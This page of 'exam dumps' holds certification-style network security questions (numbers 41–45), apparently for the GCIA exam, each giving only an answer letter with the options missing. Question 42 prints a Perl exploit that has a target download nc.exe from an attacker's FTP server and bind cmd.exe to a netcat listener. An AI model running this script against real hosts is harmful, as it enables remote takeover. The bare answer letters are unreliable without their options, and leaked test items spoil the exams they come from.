Free GCIA Exam Dumps

Question 41

Mark works as the Network Administrator of a Windows 2000 based network. The network has a DNS server installed. He experiences host name resolution problems on the network. In order to rectify the situation, he wants to troubleshoot DNS name resolution problems on the network.
Which of the following tools will he use to do this?

Correct Answer:A

Question 42

Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...n";
print "Server will download the file nc.exe from $your FTP server.n"; system("perl msadc.pl -h $host -C "echo
open $your >sasfile""); system("perl msadc.pl -h $host -C "echo $user>>sasfile"");
system("perl msadc.pl -h $host -C "echo $pass>>sasfile"");
system("perl msadc.pl -h $host -C "echo bin>>sasfile"");
system("perl msadc.pl -h $host -C "echo get nc.exe>>sasfile"");
system("perl msadc.pl -h $host -C "echo get hacked. html>>sasfile"");
system("perl msadc.pl -h $host -C "echo quit>>sasfile"");
print "Server is downloading ... n";
system("perl msadc.pl -h $host -C "ftp -s:sasfile"");
print "Press ENTER when
download is finished ...
(Have a ftp server)n";
$o=; print "Opening ...n";
system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); print "Done.n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

Correct Answer:D

Question 43

You work as a Network Administrator for McNeil Inc. The company's Windows 2000-based network is configured with Internet Security and Acceleration (ISA) Server 2000. You want to configure intrusion detection on the server. You find that the different types of attacks on the Intrusion Detection tab page of the IP Packet Filters Properties dialog box are disabled. What is the most likely cause?

Correct Answer:D

Question 44

An attacker wants to launch an attack on a wired Ethernet. He wants to accomplish the following tasks:
Sniff data frames on a local area network.
Modify the network traffic.
Stop the network traffic frequently.
Which of the following techniques will the attacker use to accomplish the task?

Correct Answer:C

Question 45

Which of the following ports is used by NTP for communication?

Correct Answer:B